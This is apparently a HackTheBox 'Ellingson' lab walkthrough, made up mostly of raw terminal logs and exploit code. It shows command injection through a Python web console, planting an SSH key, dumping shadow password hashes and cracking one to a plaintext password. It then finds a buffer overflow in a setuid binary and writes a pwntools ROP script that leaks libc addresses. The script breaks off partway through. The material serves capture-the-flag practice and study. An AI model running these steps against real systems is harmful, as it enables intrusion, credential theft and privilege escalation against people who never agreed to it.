ELLINGSON (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.139
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-20 13:51 GMT
Nmap scan report for 10.10.10.139
Host is up (0.25s latency).
Not shown: 998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 49:e8:f1:2a:80:62:de:7e:02:40:a1:f4:30:d2:88:a6 (RSA)
| 256 c8:02:cf:a0:f2:d8:5d:4f:7d:c7:66:0b:4d:5d:0b:df (ECDSA)
|_ 256 a5:a9:95:f5:4a:f4:ae:f8:b6:37:92:b8:9a:2a:b4:66 (ED25519)
80/tcp open http nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
| http-title: Ellingson Mineral Corp
|_Requested resource was http://10.10.10.139/index
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 – 4.11 (92%), Linux 3.18 (92%), Linux 3.2 – 4.9 (92%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 257.22 ms 10.10.14.1
2 257.29 ms 10.10.10.139

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 36.34 seconds

now on browser

http://10.10.10.139/index

http://10.10.10.139/articles/4

go to this section and click on it

now from right side click on terminal icon

now we get

>>>

[console ready]
>>> print (os.popen(‘whoami’).read())
hal

>>> print (os.popen(‘pwd’).read())
/home/hal/.ssh

>>> print (os.popen(‘ls -la /home’).read())
total 24
drwxr-xr-x 6 root root 4096 Mar 9 2019 .
drwxr-xr-x 23 root root 4096 Mar 9 2019 ..
drwxrwx— 3 duke duke 4096 Mar 10 2019 duke
drwxrwx— 6 hal hal 4096 Oct 20 15:11 hal
drwxrwx— 6 margo margo 4096 Oct 20 07:34 margo
drwxrwx— 4 theplague theplague 4096 May 7 13:13 theplague

>>> print (os.popen(‘ls -la /home/hal’).read())
total 1764
drwxrwx— 6 hal hal 4096 Oct 20 15:11 .
drwxr-xr-x 6 root root 4096 Mar 9 2019 ..
-rw——- 1 hal hal 27 Oct 20 12:42 .bash_history
-rw-r–r– 1 hal hal 220 Mar 9 2019 .bash_logout
-rw-r–r– 1 hal hal 3771 Mar 9 2019 .bashrc
drwx—— 2 hal hal 4096 Mar 10 2019 .cache
-rwxrw-r– 1 hal hal 1884 Oct 20 12:23 exp.py
drwx—— 3 hal hal 4096 Mar 10 2019 .gnupg
-rw——- 1 hal hal 32 Oct 20 12:51 .lesshst
drwxrwxr-x 3 hal hal 4096 Oct 20 14:11 .local
-rw-rw-r– 1 hal hal 31736 Oct 20 15:11 lse.sh
-rw-rw-r– 1 hal hal 1703336 Oct 20 12:53 passwds_grepped
-rw-r–r– 1 hal hal 807 Mar 9 2019 .profile
-rw-rw-r– 1 hal hal 220 Oct 20 12:33 README
drwx—— 2 hal hal 4096 Oct 20 15:35 .ssh
-rw——- 1 hal hal 15779 Oct 20 15:11 .viminfo

>>> print (os.popen(‘echo \”ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDcjKx5tEgc2b/pdST6kzxOd7pNy5MdXbBlAYqOV+dEr16M3XMKi99IeQEEjbsJZZNpAdc4ESY1DIp3SAsfT96/iRzbFmSlDbzMrr/43a929L1JQ3r4IdUCsOGf5/Obet7OcqLZCR+0SWxosy2md/ByKASXeRhmPrV1KmfGAjIovDgRmnerSU4sBXUeOj7xHMchOD9A2a6KElX/whgHrlwXZwkkyEmI0JmMV/ROnlTbLGIxXbwLsRd0cPfz/gmJ2xtqdk40cWazXQfYHBkNo6rOXP2KcKjmrqTRowX6L4x7d8cNgkv2WMAs1Keb8nic1WVzq7J4CGe71O4SxG3PRFmSfd/VJHM4Jfx78kic2KtFjgdG3rB9qQ9puCwXbrfL7ZB1WTccnEhOOP4E4FQFJytLWEpsLCOqFgXeJYVUbUGedOEXyPKyPSVoBEp/mbQ5qVhXoLRa3Uvt+C2OT5oDQ/0XMRMVWj4lTsiI5x3WdGc8Le+fTixaTc3Irbrz2vrBZ/k= root@kali\” > /home/hal/.ssh/authorized_keys’).read())

now on terminal

root@kali:~/Downloads# ssh -i ./id_rsa hal@ellingson.htb
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-46-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun Oct 20 16:15:49 UTC 2019

System load: 0.0 Processes: 124
Usage of /: 23.7% of 19.56GB Users logged in: 2
Memory usage: 32% IP address for ens33: 10.10.10.139
Swap usage: 0%

=> There is 1 zombie process.

* Canonical Livepatch is available for installation.
– Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

163 packages can be updated.
80 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Oct 20 15:06:21 2019 from 10.10.14.27
hal@ellingson:~$

hal@ellingson:~$ ls -la
total 1764
drwxrwx— 6 hal hal 4096 Oct 20 15:11 .
drwxr-xr-x 6 root root 4096 Mar 9 2019 ..
-rw——- 1 hal hal 27 Oct 20 12:42 .bash_history
-rw-r–r– 1 hal hal 220 Mar 9 2019 .bash_logout
-rw-r–r– 1 hal hal 3771 Mar 9 2019 .bashrc
drwx—— 2 hal hal 4096 Mar 10 2019 .cache
-rwxrw-r– 1 hal hal 1884 Oct 20 12:23 exp.py
drwx—— 3 hal hal 4096 Mar 10 2019 .gnupg
-rw——- 1 hal hal 32 Oct 20 12:51 .lesshst
drwxrwxr-x 3 hal hal 4096 Oct 20 14:11 .local
-rw-rw-r– 1 hal hal 31736 Oct 20 15:11 lse.sh
-rw-rw-r– 1 hal hal 1703336 Oct 20 12:53 passwds_grepped
-rw-r–r– 1 hal hal 807 Mar 9 2019 .profile
-rw-rw-r– 1 hal hal 220 Oct 20 12:33 README
drwx—— 2 hal hal 4096 Oct 20 15:35 .ssh
-rw——- 1 hal hal 15779 Oct 20 15:11 .viminfo

hal@ellingson:~$ cd /var/backups
hal@ellingson:/var/backups$ ls -la
total 888
drwxr-xr-x 2 root root 4096 Oct 20 06:25 .
drwxr-xr-x 14 root root 4096 Mar 9 2019 ..
-rw-r–r– 1 root root 61440 Mar 10 2019 alternatives.tar.0
-rw-r–r– 1 root root 8255 Mar 9 2019 apt.extended_states.0
-rw-r–r– 1 root root 437 Jul 25 2018 dpkg.diversions.0
-rw-r–r– 1 root root 202 Jul 25 2018 dpkg.diversions.1.gz
-rw-r–r– 1 root root 295 Mar 9 2019 dpkg.statoverride.0
-rw-r–r– 1 root root 196 Mar 9 2019 dpkg.statoverride.1.gz
-rw-r–r– 1 root root 616296 May 7 11:23 dpkg.status.0
-rw-r–r– 1 root root 175878 Mar 9 2019 dpkg.status.1.gz
-rw——- 1 root root 825 May 7 11:22 group.bak
-rw——- 1 root shadow 689 May 7 11:22 gshadow.bak
-rw——- 1 root root 1757 Mar 9 2019 passwd.bak
-rw——- 1 root shadow 1330 Mar 9 2019 shadow.bak

hal@ellingson:/var/backups$ cat shadow.bak
root:*:17737:0:99999:7:::
daemon:*:17737:0:99999:7:::
bin:*:17737:0:99999:7:::
sys:*:17737:0:99999:7:::
sync:*:17737:0:99999:7:::
games:*:17737:0:99999:7:::
man:*:17737:0:99999:7:::
lp:*:17737:0:99999:7:::
mail:*:17737:0:99999:7:::
news:*:17737:0:99999:7:::
uucp:*:17737:0:99999:7:::
proxy:*:17737:0:99999:7:::
www-data:*:17737:0:99999:7:::
backup:*:17737:0:99999:7:::
list:*:17737:0:99999:7:::
irc:*:17737:0:99999:7:::
gnats:*:17737:0:99999:7:::
nobody:*:17737:0:99999:7:::
systemd-network:*:17737:0:99999:7:::
systemd-resolve:*:17737:0:99999:7:::
syslog:*:17737:0:99999:7:::
messagebus:*:17737:0:99999:7:::
_apt:*:17737:0:99999:7:::
lxd:*:17737:0:99999:7:::
uuidd:*:17737:0:99999:7:::
dnsmasq:*:17737:0:99999:7:::
landscape:*:17737:0:99999:7:::
pollinate:*:17737:0:99999:7:::
sshd:*:17737:0:99999:7:::
theplague:$6$.5ef7Dajxto8Lz3u$Si5BDZZ81UxRCWEJbbQH9mBCdnuptj/aG6mqeu9UfeeSY7Ot9gp2wbQLTAJaahnlTrxN613L6Vner4tO1W.ot/:17964:0:99999:7:::
hal:$6$UYTy.cHj$qGyl.fQ1PlXPllI4rbx6KM.lW6b3CJ.k32JxviVqCC2AJPpmybhsA8zPRf0/i92BTpOKtrWcqsFAcdSxEkee30:17964:0:99999:7:::
margo:$6$Lv8rcvK8$la/ms1mYal7QDxbXUYiD7LAADl.yE4H7mUGF6eTlYaZ2DVPi9z1bDIzqGZFwWrPkRrB9G/kbd72poeAnyJL4c1:17964:0:99999:7:::
duke:$6$bFjry0BT$OtPFpMfL/KuUZOafZalqHINNX/acVeIDiXXCPo9dPi1YHOp9AAAAnFTfEh.2AheGIvXMGMnEFl5DlTAbIzwYc/:17964:0:99999:7:::

on another terminal

root@kali:~/Downloads# echo ‘margo:$6$Lv8rcvK8$la/ms1mYal7QDxbXUYiD7LAADl.yE4H7mUGF6eTlYaZ2DVPi9z1bDIzqGZFwWrPkRrB9G/kbd72poeAnyJL4c1:17964:0:99999:7:::’ > margo.hash

root@kali:~/Downloads# grep -i god /usr/share/wordlists/rockyou.txt > list.txt

root@kali:~/Downloads# john –wordlist=./list.txt margo.hash
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 128/128 AVX 2x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 4 OpenMP threads
Press ‘q’ or Ctrl-C to abort, almost any other key for status
iamgod$08 (margo)
1g 0:00:00:01 DONE (2019-10-20 16:18) 0.5464g/s 3777p/s 3777c/s 3777C/s iamgod22..gupgod
Use the “–show” option to display all of the cracked passwords reliably
Session completed

root@kali:~/Downloads# ssh margo@ellingson.htb
margo@ellingson.htb’s password: iamgod$08
Welcome to Ubuntu 18.04.1 LTS (GNU/Linux 4.15.0-46-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Sun Oct 20 16:21:21 UTC 2019

System load: 0.0 Processes: 127
Usage of /: 23.7% of 19.56GB Users logged in: 2
Memory usage: 32% IP address for ens33: 10.10.10.139
Swap usage: 0%

=> There is 1 zombie process.

* Canonical Livepatch is available for installation.
– Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch

163 packages can be updated.
80 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Oct 20 13:39:26 2019 from 10.10.15.60
margo@ellingson:~$

margo@ellingson:~$ cat user.txt
d0ff9e3f9da8bXXXXXXXXXXXXXXXXXXXXXXXX

margo@ellingson:~$ find / -perm -4000 2>/dev/null
/usr/bin/at
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/garbage
/usr/bin/newuidmap
/usr/bin/sudo
/usr/bin/traceroute6.iputils
/usr/bin/chfn
/usr/bin/newgidmap
/usr/bin/chsh
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/bin/su
/bin/umount
/bin/ntfs-3g
/bin/ping
/bin/mount
/bin/fusermount
/snap/core/6405/bin/mount
/snap/core/6405/bin/ping
/snap/core/6405/bin/ping6
/snap/core/6405/bin/su
/snap/core/6405/bin/umount
/snap/core/6405/usr/bin/chfn
/snap/core/6405/usr/bin/chsh
/snap/core/6405/usr/bin/gpasswd
/snap/core/6405/usr/bin/newgrp
/snap/core/6405/usr/bin/passwd
/snap/core/6405/usr/bin/sudo
/snap/core/6405/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6405/usr/lib/openssh/ssh-keysign
/snap/core/6405/usr/lib/snapd/snap-confine
/snap/core/6405/usr/sbin/pppd
/snap/core/4917/bin/mount
/snap/core/4917/bin/ping
/snap/core/4917/bin/ping6
/snap/core/4917/bin/su
/snap/core/4917/bin/umount
/snap/core/4917/usr/bin/chfn
/snap/core/4917/usr/bin/chsh
/snap/core/4917/usr/bin/gpasswd
/snap/core/4917/usr/bin/newgrp
/snap/core/4917/usr/bin/passwd
/snap/core/4917/usr/bin/sudo
/snap/core/4917/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/4917/usr/lib/openssh/ssh-keysign
/snap/core/4917/usr/lib/snapd/snap-confine
/snap/core/4917/usr/sbin/pppd
/snap/core/6818/bin/mount
/snap/core/6818/bin/ping
/snap/core/6818/bin/ping6
/snap/core/6818/bin/su
/snap/core/6818/bin/umount
/snap/core/6818/usr/bin/chfn
/snap/core/6818/usr/bin/chsh
/snap/core/6818/usr/bin/gpasswd
/snap/core/6818/usr/bin/newgrp
/snap/core/6818/usr/bin/passwd
/snap/core/6818/usr/bin/sudo
/snap/core/6818/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/snap/core/6818/usr/lib/openssh/ssh-keysign
/snap/core/6818/usr/lib/snapd/snap-confine
/snap/core/6818/usr/sbin/pppd

margo@ellingson:~$ /usr/bin/garbage
Enter access password: test

access denied.

margo@ellingson:~$ /usr/bin/garbage
Enter access password: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

access denied.
Segmentation fault (core dumped)

root@kali:~/Downloads# scp margo@ellingson.htb:/usr/bin/garbage ./
margo@ellingson.htb’s password: iamgod$08
garbage 100% 18KB 34.2KB/s 00:00

root@kali:~/Downloads# file garbage
garbage: setuid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=de1fde9d14eea8a6dfd050fffe52bba92a339959, not stripped

root@kali:~/Desktop/HTB/boxes/ellingson# checksec ./garbage
[*] ‘/root/Desktop/HTB/boxes/ellingson/garbage’
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE

back to shell

margo@ellingson:~$ cat /proc/sys/kernel/randomize_va_space
2

margo@ellingson:~$ ldd /usr/bin/garbage
linux-vdso.so.1 (0x00007ffe349e2000)
libc.so.6 => /lib/x86_64-linux-gnu/libc.so.6 (0x00007f478a843000)
/lib64/ld-linux-x86-64.so.2 (0x00007f478ac34000)

on another terminal

root@kali:~/Downloads# scp margo@ellingson.htb:/lib/x86_64-linux-gnu/libc.so.6 ./
margo@ellingson.htb’s password:iamgod$08
libc.so.6

100% 1983KB 951.6KB/s 00:02
root@kali:~/Downloads# wget -O ~/.gdbinit-gef.py -q https://github.com/hugsy/gef/raw/master/gef.py
root@kali:~/Downloads# echo source ~/.gdbinit-gef.py >> ~/.gdbinit

root@kali:~/Downloads# gdb -q garbage
GEF for linux ready, type `gef’ to start, `gef config’ to configure
77 commands loaded for GDB 8.3 using Python engine 3.7
[*] 3 commands could not be loaded, run `gef missing` to know why.
GEF for linux ready, type `gef’ to start, `gef config’ to configure
77 commands loaded for GDB 8.3 using Python engine 3.7
[*] 3 commands could not be loaded, run `gef missing` to know why.
Reading symbols from garbage…
(No debugging symbols found in garbage)
gef➤ pattern create
[+] Generating a pattern of 1024 bytes
aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaaezaaaaaafbaaaaaafcaaaaaaf
[+] Saved as ‘$_gef0’

gef➤ r
Starting program: /root/Downloads/garbage
Enter access password: aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaagaaaaaaahaaaaaaaiaaaaaaajaaaaaaakaaaaaaalaaaaaaamaaaaaaanaaaaaaaoaaaaaaapaaaaaaaqaaaaaaaraaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfaaaaaabgaaaaaabhaaaaaabiaaaaaabjaaaaaabkaaaaaablaaaaaabmaaaaaabnaaaaaaboaaaaaabpaaaaaabqaaaaaabraaaaaabsaaaaaabtaaaaaabuaaaaaabvaaaaaabwaaaaaabxaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaaceaaaaaacfaaaaaacgaaaaaachaaaaaaciaaaaaacjaaaaaackaaaaaaclaaaaaacmaaaaaacnaaaaaacoaaaaaacpaaaaaacqaaaaaacraaaaaacsaaaaaactaaaaaacuaaaaaacvaaaaaacwaaaaaacxaaaaaacyaaaaaaczaaaaaadbaaaaaadcaaaaaaddaaaaaadeaaaaaadfaaaaaadgaaaaaadhaaaaaadiaaaaaadjaaaaaadkaaaaaadlaaaaaadmaaaaaadnaaaaaadoaaaaaadpaaaaaadqaaaaaadraaaaaadsaaaaaadtaaaaaaduaaaaaadvaaaaaadwaaaaaadxaaaaaadyaaaaaadzaaaaaaebaaaaaaecaaaaaaedaaaaaaeeaaaaaaefaaaaaaegaaaaaaehaaaaaaeiaaaaaaejaaaaaaekaaaaaaelaaaaaaemaaaaaaenaaaaaaeoaaaaaaepaaaaaaeqaaaaaaeraaaaaaesaaaaaaetaaaaaaeuaaaaaaevaaaaaaewaaaaaaexaaaaaaeyaaaaaaezaaaaaafbaaaaaafcaaaaaaf

access denied.

Program received signal SIGSEGV, Segmentation fault.
0x0000000000401618 in auth ()
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x0
$rbx : 0x0
$rcx : 0x00007fb5f32ad504 → 0x5477fffff0003d48 (“H=”?)
$rdx : 0x00007fb5f33808c0 → 0x0000000000000000
$rsp : 0x00007ffec6b15558 → “raaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxa[…]”
$rbp : 0x6161616161616171 (“qaaaaaaa”?)
$rsi : 0x00000000007c4640 → “access denied.\nssword:”
$rdi : 0x0
$rip : 0x0000000000401618 → <auth+261> ret
$r8 : 0x00007fb5f3385500 → 0x00007fb5f3385500 → [loop detected]
$r9 : 0x00007fb5f337f848 → 0x00007fb5f337f760 → 0x00000000fbad2a84
$r10 : 0xfffffffffffff638
$r11 : 0x246
$r12 : 0x0000000000401170 → <_start+0> xor ebp, ebp
$r13 : 0x00007ffec6b15650 → “xaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaacea[…]”
$r14 : 0x0
$r15 : 0x0
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007ffec6b15558│+0x0000: “raaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxa[…]” ← $rsp
0x00007ffec6b15560│+0x0008: “saaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaaya[…]”
0x00007ffec6b15568│+0x0010: “taaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaaza[…]”
0x00007ffec6b15570│+0x0018: “uaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabba[…]”
0x00007ffec6b15578│+0x0020: “vaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabca[…]”
0x00007ffec6b15580│+0x0028: “waaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabda[…]”
0x00007ffec6b15588│+0x0030: “xaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabea[…]”
0x00007ffec6b15590│+0x0038: “yaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfa[…]”
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x40160d <auth+250> call 0x401050 <puts@plt> 0x401612 <auth+255> mov eax, 0x0
0x401617 <auth+260> leave
→ 0x401618 <auth+261> ret
[!] Cannot disassemble from $PC
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: “garbage”, stopped, reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x401618 → auth()
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
[ Legend: Modified register | Code | Heap | Stack | String ]
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── registers ────
$rax : 0x0
$rbx : 0x0
$rcx : 0x00007fb5f32ad504 → 0x5477fffff0003d48 (“H=”?)
$rdx : 0x00007fb5f33808c0 → 0x0000000000000000
$rsp : 0x00007ffec6b15558 → “raaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxa[…]”
$rbp : 0x6161616161616171 (“qaaaaaaa”?)
$rsi : 0x00000000007c4640 → “access denied.\nssword:”
$rdi : 0x0
$rip : 0x0000000000401618 → <auth+261> ret
$r8 : 0x00007fb5f3385500 → 0x00007fb5f3385500 → [loop detected]
$r9 : 0x00007fb5f337f848 → 0x00007fb5f337f760 → 0x00000000fbad2a84
$r10 : 0xfffffffffffff638
$r11 : 0x246
$r12 : 0x0000000000401170 → <_start+0> xor ebp, ebp
$r13 : 0x00007ffec6b15650 → “xaaaaaabyaaaaaabzaaaaaacbaaaaaaccaaaaaacdaaaaaacea[…]”
$r14 : 0x0
$r15 : 0x0
$eflags: [ZERO carry PARITY adjust sign trap INTERRUPT direction overflow RESUME virtualx86 identification]
$cs: 0x0033 $ss: 0x002b $ds: 0x0000 $es: 0x0000 $fs: 0x0000 $gs: 0x0000
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── stack ────
0x00007ffec6b15558│+0x0000: “raaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxa[…]” ← $rsp
0x00007ffec6b15560│+0x0008: “saaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaaya[…]”
0x00007ffec6b15568│+0x0010: “taaaaaaauaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaaza[…]”
0x00007ffec6b15570│+0x0018: “uaaaaaaavaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabba[…]”
0x00007ffec6b15578│+0x0020: “vaaaaaaawaaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabca[…]”
0x00007ffec6b15580│+0x0028: “waaaaaaaxaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabda[…]”
0x00007ffec6b15588│+0x0030: “xaaaaaaayaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabea[…]”
0x00007ffec6b15590│+0x0038: “yaaaaaaazaaaaaabbaaaaaabcaaaaaabdaaaaaabeaaaaaabfa[…]”
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── code:x86:64 ────
0x40160d <auth+250> call 0x401050 <puts@plt> 0x401612 <auth+255> mov eax, 0x0
0x401617 <auth+260> leave
→ 0x401618 <auth+261> ret
[!] Cannot disassemble from $PC
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── threads ────
[#0] Id 1, Name: “garbage”, stopped, reason: SIGSEGV
───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────── trace ────
[#0] 0x401618 → auth()
────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
gef➤ </auth+261></auth+260></auth+255></puts@plt></auth+250></auth+261></auth+261></auth+260></auth+255></puts@plt></auth+250></auth+261>

gef➤ pattern offset raaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxa
[+] Searching ‘raaaaaaasaaaaaaataaaaaaauaaaaaaavaaaaaaawaaaaaaaxa’
[+] Found at offset 136 (big-endian search)

on another terminal

root@kali:~# gedit exploit.py

#!/usr/bin/python
from pwn import *

def leak(p,elf,libc,rop):
POP_RDI = (rop.find_gadget([‘pop rdi’, ‘ret’]))[0]
LIBC_START_MAIN = elf.symbols[‘__libc_start_main’]
PUTS = elf.plt[‘puts’]
MAIN = elf.symbols[‘main’]

log.info(“puts@plt: ” + hex(PUTS))
log.info(“__libc_start_main: ” + hex(LIBC_START_MAIN))
log.info(“pop rdi gadget: ” + hex(POP_RDI))

payload = “A” * 136
payload += p64(POP_RDI)
payload += p64(LIBC_START_MAIN)
payload += p64(PUTS)
payload += p64(MAIN)

p.recvuntil(‘password:’)
p.sendline(payload)
p.recvline()
p.recvline()
leak = p.recvline().strip()
leak = u64(leak.ljust(8, “\x00”))

log.success(“Leaked __libc_start_main: ” + hex(leak))
return leak

r = ssh(host=’ellingson.htb’, user=’margo’, password=’iamgod$08′)
p = r.process(‘/usr/bin/garbage’)

elf = ELF(“./garbage”)
libc = ELF(“./libc.so.6”)
rop = ROP(elf)

leak = leak(p,elf,libc,rop)

save it

root@kali:~/Downloads# gedit exploit.py

root@kali:~/Downloads# chmod +x exploit.py

root@kali:~/Downloads# ./exploit.py
[*] Checking for new versions of pwntools
To disable this functionality, set the contents of /root/.pwntools-cache/update to ‘never’.
[*] You have the latest version of Pwntools (3.12.2)
[+] Connecting to ellingson.htb on port 22: Done
[*] margo@ellingson.htb:
Distro Ubuntu 18.04
OS: linux
Arch: amd64
Version: 4.15.0
ASLR: Enabled
[+] Starting remote process ‘/usr/bin/garbage’ on ellingson.htb: pid 32343
[*] ‘/root/Downloads/garbage’
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] ‘/root/Downloads/libc.so.6’
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Loading gadgets for ‘/root/Downloads/garbage’
[*] puts@plt: 0x401050
[*] __libc_start_main: 0x403ff0
[*] pop rdi gadget: 0x40179b
[+] Leaked __libc_start_main: 0xb0

root@kali:~/Downloads# ./exploit.py
[+] Connecting to ellingson.htb on port 22: Done
[*] margo@ellingson.htb:
Distro Ubuntu 18.04
OS: linux
Arch: amd64
Version: 4.15.0
ASLR: Enabled
[+] Starting remote process ‘/usr/bin/garbage’ on ellingson.htb: pid 32434
[*] ‘/root/Downloads/garbage’
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
[*] ‘/root/Downloads/libc.so.6’
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: PIE enabled
[*] Loaded cached gadgets for ‘./garbage’
[*] puts@plt: 0x401050
[*] __libc_start_main: 0x403ff0
[*] pop rdi gadget: 0x40179b
[+] Leaked __libc_start_main: 0x7f6bdd438ab0

root@kali:~# gedit exploit.py

#!/usr/bin/python
from pwn import *

def leak(p,elf,libc,rop):
POP_RDI = (rop.find_gadget([‘pop rdi’, ‘ret’]))[0]
LIBC_START_MAIN = elf.symbols[‘__libc_start_main’]
PUTS = elf.plt[‘puts’]
MAIN = elf.symbols[‘main’]

log.info(“puts@plt: ” + hex(PUTS))
